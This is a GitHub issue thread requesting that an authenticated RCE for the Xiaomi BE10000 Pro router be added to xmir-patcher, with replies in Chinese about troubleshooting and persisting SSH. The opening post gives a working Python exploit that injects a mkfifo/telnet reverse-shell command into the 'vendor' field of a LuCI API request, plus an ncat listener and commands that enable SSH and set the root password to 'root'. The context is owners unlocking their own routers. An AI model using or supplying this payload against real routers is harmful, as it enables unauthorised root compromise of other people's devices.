[Feature Request] Add support for Xiaomi Router BE10000 Pro via authorized remote RCE vulnerability

[Xierfei]

Device Model

Xiaomi Router BE10000 Pro (小米路由器 BE10000 Pro)

Current Status

The xmir-patcher currently does not support the BE10000 Pro model. Existing methods (such as old firmware downgrades or specific exploit scripts) do not work on this device.

Discovery

I found a valid Authorized Remote Code Execution (RCE) vulnerability that works on the latest firmware of the BE10000 Pro. This vulnerability allows executing arbitrary commands with root privileges if a valid login token (stok) is provided.

Reference vulnerability analysis (Chinese): https://xz.aliyun.com/news/91619

Proof of Concept (PoC)

I have successfully verified this method to enable SSH on my BE10000 Pro. Below are the steps:

Prerequisites

1. A computer on the same LAN as the router.
2. A valid stok token from the router (usually obtained by logging into the web interface http://192.168.31.1 and extracting it from the URL).
3. Python 3 with the requests library installed.
4. ncat (from nmap) installed on the listening machine.

Step 1: Start Listener

On your computer, start a netcat listener to receive the reverse shell:

ncat -lvnp 8888

Step 2: Trigger RCE and Get Shell

Run the following Python script.
Note: Replace YOUR_STOK_TOKEN with your actual router token and YOUR_PC_IP with your computer's IP address.

import requests

# Configuration
server_ip = "192.168.31.1"       # Router IP
token = "YOUR_STOK_TOKEN"        # REPLACE THIS with your actual stok
listener_ip = "192.168.31.7"     # REPLACE THIS with your PC's IP
listener_port = "8888"

# Payload: Reverse shell via telnet
# Using telnet because busybox on some firmwares might lack full netcat features, 
# but mkfifo + telnet is a reliable standard method.
shell = f";mkfifo /tmp/f; telnet {listener_ip} {listener_port} 0</tmp/f 2>&1 | /bin/sh > /tmp/f; #"

data = {
    'payload': '{"api":7,"dev":"a","vendor":"' + shell + '","type":"a"}'
}

url = f"http://{server_ip}/cgi-bin/luci/;stok={token}/api/xqdatacenter/request"

print(f"Sending payload to {url}...")
try:
    res = requests.post(url, data=data, timeout=10)
    print("Response:", res.text)
except Exception as e:
    print(f"Error: {e}")

Step 3: Enable SSH

Once you get the shell connection in your terminal from Step 1, run the following commands to enable SSH and set the root password:

# Enable services
nvram set ssh_en=1
nvram set telnet_en=1
nvram set uart_en=1
nvram set boot_wait=on
nvram commit

# Fix dropbear configuration (force debug channel if necessary)
sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear

# Restart dropbear
/etc/init.d/dropbear restart

# Set root password (change 'root' to your desired password)
echo -e 'root\nroot' | passwd root

After running these commands, you should be able to SSH into the router:

ssh root@192.168.31.1

Suggestion for xmir-patcher

Could you please integrate this exploitation method into xmir-patcher?
Since this relies on an authenticated RCE, the tool could:

1. Prompt the user to log in via the web UI or input their password to retrieve the stok.
2. Automatically inject the payload to enable SSH.
3. This would provide a clean, software-based unlock solution for the BE10000 Pro.

Environment Details

• Router Model: BE10000 Pro
• Firmware Version: 1.0.70 download

Thank you for maintaining this great project!

PS: My English is not very good, so the content above was written with the assistance of AI. I hope the technical details are clear and helpful.

[superdami-code]

我运行Python脚本只能得到超时的结果
Error: HTTPConnectionPool(host='192.168.31.1', port=80): Read timed out. (read timeout=10)

Ncat 是有监听到信息的。
Ncat: Version 7.98 ( https://nmap.org/ncat )
Ncat: Listening on [::]:8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 192.168.31.1:53271.

是哪里出了问题？固件已经是相应版本

[Xierfei]

我运行Python脚本只能得到超时的结果 Error: HTTPConnectionPool(host='192.168.31.1', port=80): Read timed out. (read timeout=10)

Ncat 是有监听到信息的。 Ncat: Version 7.98 ( https://nmap.org/ncat ) Ncat: Listening on [::]:8888 Ncat: Listening on 0.0.0.0:8888 Ncat: Connection from 192.168.31.1:53271.

是哪里出了问题？固件已经是相应版本

使用反弹shell的时候不用关心python的返回结果，这个脚本是将/bin/sh 重定向用telnet发送到你ncat监听的端口上。
实际上当出现Ncat: Connection from 192.168.31.1:53271.时就已经成功了，你需要在终端中输入命令。不过要注意，每行命令后面需要加分号;。

你也可以尝试直接整个复制如下命令来开启。

nvram set ssh_en=1;

nvram set telnet_en=1;

nvram set uart_en=1;

nvram set boot_wait=on;

nvram commit;

sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear;

/etc/init.d/dropbear restart;

echo -e 'root\nroot' | passwd root;

然后可以通过ssh root@192.168.31.1连接，密码为root

[whoami-Root]

能固化ssh吗
我想设置静态路由表 这个垃圾路由器没有这个功能

[Xierfei]

能固化ssh吗
我想设置静态路由表 这个垃圾路由器没有这个功能

可以，我也是为了静态路由开的ssh，固化成功了，但是过程有点坎坷，没有设备重现，所以就不发教程了。
我是参照之前别的小米路由器固化SSH的方案，然后telnet固化成功了，ssh没有。之后手动开ssh用这个仓库的脚本安装了一次，固化成功了。这个过程中间有很多变量，所以不保证能顺利成功。
另外这个路由器好像是有默认配置，重启完会自动恢复。比如我把eth0拆出来做一个lan2，重启后lan2还在，但是eth0回默认lan了。
目前解决方法是把/etc/config中的firewall和network拷贝到/data/myconfig中，写个替换文件脚本，重启后手动执行一下。

[superdami-code]

硬固化好像不行，软固化没问题。
可以用Auto_SSH.sh脚本或者ShellClash的固化功能固化。

bdata set ssh_en=1;
bdata set telnet_en=1;
bdata set uart_en=1;
bdata set boot_wait=on;
bdata commit

我执行这一串固化ssh的命令后提示 ioctl: I/O error

[whoami-Root]

@Xierfei @superdami-code 谢谢两位大哥 我现在试试 不然这个路由器一点用 没有 不知道我的 测试版固件能不能使用

[whoami-Root]

当前版本1.0.74 好像不能降级

[whoami-Root]

开启成功了 原来是kali没联小米

[whoami-Root]

@Xierfei 路由器 解锁ssh后设置 好 下一跳后还需要修改/etc/dnsmasq.conf 后面添加
interface=br-lan
except-interface=lo
bind-dynamic
添加后保存

然后 执行命令
killall dnsmasq
/usr/sbin/dnsmasq -C /etc/dnsmasq.conf
执行后交换机下面其他vlan 的ip段就可以正常上网了

[xx299x]

1.0.89 已经无效

[Xierfei]

1.0.89 已经无效

那真是个悲伤的故事